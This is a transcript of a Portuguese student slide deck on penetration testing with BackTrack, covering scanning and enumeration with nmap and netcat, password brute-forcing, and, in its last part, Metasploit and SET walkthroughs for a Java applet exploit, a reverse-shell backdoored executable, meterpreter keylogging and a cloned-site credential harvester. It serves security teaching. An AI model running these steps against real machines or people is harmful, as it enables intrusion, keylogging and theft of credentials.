Back track apresentação

Post on 09-Jun-2015

667 views 0 download

description

Este trabalho foi desenvolvido com a finalidade de abordar técnicas de defesas voltadas à segurança da informação, consistindo de uma atividade da cadeira de Segurança de Redes de Computadores da Universidade Católica de Pernambuco.

Transcript of Back track apresentação

Kleber Santos

Introdução

IntroduçãoO que é?

• Ferramenta voltada para testes de penetração;

• Primeira versão lançada em 2006;• Possui mais de 300 ferramentas para

tais testes;

Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link:

http://www.backtrack-linux.org/

IntroduçãoUso em Certificações

• Todas oferecidas pela Offensive Security que mantém o BackTrack.

Devido ao tamanho do arquivo, o vídeo que consistia neste slide foi removido, porém pode ser acessado através do link:

http://www.backtrackbrasil.com.br/site/vd/

Pentest

• Metodologia para testes de penetração;• Simula ataques;• Verifica a segurança de um sistema;• Possibilita criação de mecanismos de

defesa;

Pentest

• Procedimentos divididos em cinco etapas:

1. Obtenção de informações do alvo;

2. Varreduras de sistema;

3. Ganho de acesso ao sistema;

4. Mantendo o acesso ao sistema;

5. Retirada de evidencias;

• Abordaremos as três primeiras etapas divididas em quatro partes;

Pentest

• Procedimentos divididos em cinco etapas:

1. Obtenção de informações do alvo;

2. Varreduras de sistema;

3. Ganho de acesso ao sistema;

4. Mantendo o acesso ao sistema;

5. Retirada de evidencias;

• Abordaremos as três primeiras etapas divididas em quatro partes;

Primeira Parte

• Obtenção de Informação;• Detecção de Sistemas Ativos;• Técnica Para Obter Informações DNS;• FINGERPRINT;

Obtenção de Informação

• Metodologia usada para "reconhecimento do terreno";

• Pode ser de forma: passiva (recursos na internet); ativa (engenharia social);

• Princípios básicos na obtenção de informações;

• PING detecta hosts ativos;

Detecção de Sistemas Ativos

FPING: Executa ping para diferentes hosts ao mesmo

tempo através de um *.txt;

HPING3: Detecta hosts, regras de firewall e realiza

varreduras de portas;

Genlist: Verifica uma lista de hosts ativos;

Detecção de Sistemas Ativos

• DNS traduz endereços de IP em nomes de domínio;

• A ferramenta nslookup permite obter informações sobre DNS;

Informações DNS

DNSENUM: Pesquisa de hosts, nomes de servidores, registros MX, IPs, etc.

DNSMAP: Descobre subdomínios relacionados ao domínio-alvo. Acompanha

wordlist;

DNSRECON: Permite consultas reversas por faixas de IP, NS, SOA, registros MX,

transferências de zonas e enumeração de serviços;

FIERCE: Retorna informações adicionais como HINFO, especificando o

processador da máquina e o servidor;

Informações DNS

• Técnica na qual se obtém informações sobre sistema operacional;

• O NMAP é utilizado para tal checagem de versões;

root@bt~# nmap –O <ip_do_alvo>

FINGERPRINT

TCP SYN (-sS) examina portas de maneira rápida e difícil

de ser detectado por firewalls ou IDS;

TCP Connect (-sT) executa varredura utilizando o Three-Way

Handshake;

UDP (-sU) possibilita varredura do protocolo UDP;

FINGERPRINT

TCP FIN (-sF, -sX, -sN) utilizados na tentativa de travessia de

firewalls;

TCP ACK (-sA) tática utilizada para detecção de regras de

firewall;

TCP Windows (-sW) varreduras por janelas, parecido com o método

ACK, porém consegue detectar portas abertas versus filtradas e não filtradas;

FINGERPRINT

Segunda Parte

• SCANNING de portas• Detecção de Sistemas Ativos;• NETCAT – Canivete Suíço;

SCANNING de portas

• Port Scan é a técnica usada para descobrir serviços vulneráveis em um sistema;

Scanning de portas: identifica portas ativas;

De vulnerabilidades: identifica fraquezas no sistema;

De redes: identifica os hosts ativos;

Detecção de Sistemas Ativos

NETCAT – Canivete Suíço

• Outra ferramenta possível para varreduras num host;

root@root:~# nc -v -z 192.168.32.128 1-4000

• Fase de Enumeração;• HTTPRINT;• AMAP, SMTP e SMTPSCAN;

Terceira Parte

Fase de Enumeração

• Nesta fase o invasor tenta obter: nomes de máquinas; usuários; serviços e versões; compartilhamentos, etc;

• A ferramenta Nbtscan nos permite obter nome e endereço MAC de um alvo;

Fase de Enumeração

• Através do nmap podemos executar varredura procurando por serviços que utilizem o protocolo UDP:

root@root~# nmap –T4 –sU –sV <ip_host_alvo>

Fase de Enumeração

• Obtendo retorno de serviços snmp podemos obter informações SNMP com o Snmpcheck:

root@root:/pentest/enumeration/snmp/snmpcheck# ./snmpcheck-1.8.pl –t <ip_host_alvo>

HTTPRINT

• Possibilita detectar versões de servidores;

• Fornece opção de exporta-las para arquivos *.html, *.csv ou *.xml

AMAP, SMTP e SMTPSCAN

AMAP tenta identificar aplicações rodando em

portas diferentes da usual.

SMTP e SMTPScan busca usuários válidos do nosso host,

destinando um IP alvo;

• Ganho de Acesso;• Abordagem à Força Bruta;• SET e Metasploit;

Quarta Parte

Ganho de Acesso

• Utiliza de ferramentas que explorem serviços como FTP e SSH;

• Explora vulnerabilidades e senhas;• A técnica de engenharia social é

extremamente importante em tal etapa;

Força Bruta

xHydra ou Hidra-GTK

Ferramenta utilizada para quebra de senhas ONLINE;

Suporta diversos protocolos; Permite utilização de arquivos auxiliares

para listas de usuários e senhas (wordlists);

Força Bruta

• Dicionários e força bruta são técnicas utilizadas para o password cracking;

• Outras ferramentas para o mesmo intuito são:

Medusa; John The Ripper;

Todas elas inclusas no BackTrack 5 R3;

Invadindo Sistemas com SET e Metasploit

Metasploit Conta com uma interface gráfica

ARMITAGE e também a linha de comando, MSFCONSOLE;

SET Tem como alvo fraquezas e estupidez

humanas;

Invadindo Sistemas com SET e Metasploit

• Através do comando msfconsole acessamos o Metasploit via linha de comando;

• Configuraremos nossa máquina BackTrack para receber informações do alvo através de uma vulnerabilidade do Java;

Invadindo Sistemas com SET e Metasploit

Invadindo Sistemas com SET e Metasploit

• root@bt:~# msfconsole

• root@bt:~# search java

• root@bt:~# use exploit/multi/browser/java_signed_applet

• root@bt:~# show options

Invadindo Sistemas com SET e Metasploit

set srvhost <ip_local_host_backTrack>

set srvport 80 #seta a porta 80 como acesso

set uripath <caminho_para_link_url>

set appletname <nome_para_o_arquivo_jar>

exploit

Invadindo Sistemas com SET e Metasploit

• Após acessar a URL gerada o alvo permitirá acesso ao invasor;

sessions –i 1 # dá acesso à máquina alvo

sysinfo# obtém informações da máquina alvo

Invadindo Sistemas com SET e Metasploit

help# lista comandos do METERPRETER

screenshot# obtém um print da tela da máquina invadida

Invadindo Sistemas com SET e Metasploit

keyscan_start# starta um sniffer para captura de navegação

keyscan_dump# exibe informações capturadas

Invadindo Sistemas com SET e Metasploit

• Técnica semelhante pode ser explorada através da ferramenta SET gerando-se um payload;

• Ao acessar a ferramenta, navega-se em:

1 – Social Engineering Attacks;4 – Create a Payload na Listener;

Invadindo Sistemas com SET e Metasploit

• Deve-se informar o IP da máquina que receberá as informações obtidas através do payload (IP da máquina BackTrack);

• Feito isso, navega-se em:

2 – Windows Reverse TCP Meterpreter;16 – Backdoored Executable (BEST);

Invadindo Sistemas com SET e Metasploit

• Após informar a porta solicitada, ele gerará o arquivo executável:

/pentest/exploits/set msf.exe

• Confirma-se com yes o start do listener;• O acesso à máquina alvo se dará após a

execução do arquivo pela mesma e executando:

sessions –i 1.

Invadindo Sistemas com SET e Metasploit

• Com a mesma ferramenta SET, podemos clonar páginas web para obter informações de uma vítima através das opções:

1 – Social Engineering Attacks;2 – Website Attack Vectors;3 – Credential Harvester Attack Vectors;2 – Site Cloner;

Invadindo Sistemas com SET e Metasploit

• Informa-se a URL do site a ser clonado;

• Acessa-se através do IP da máquina do atacante;

Obs.: Podemos atribuir um domínio ao IP para facilitar o acesso pela vítima;

Conclusão

• Técnicas de invasão estão

diretamente atreladas às

vulnerabilidades dos sistemas e das pessoas

Conclusão

• Configurar devidamente servidores;• Atualizar devidamente SOs e SWs;• Utilização de senhas fortes;• Desconfiar de coisas óbvias;• Usufruir de uma política de segurança;

Conclusão

• Atentar à boas práticas voltadas

à segurança nos dá uma garantia quanto

ao CID;

klebernox.wordpress.com/backtrack-abordagem-a-seguranca-em-redes/

Obrigado !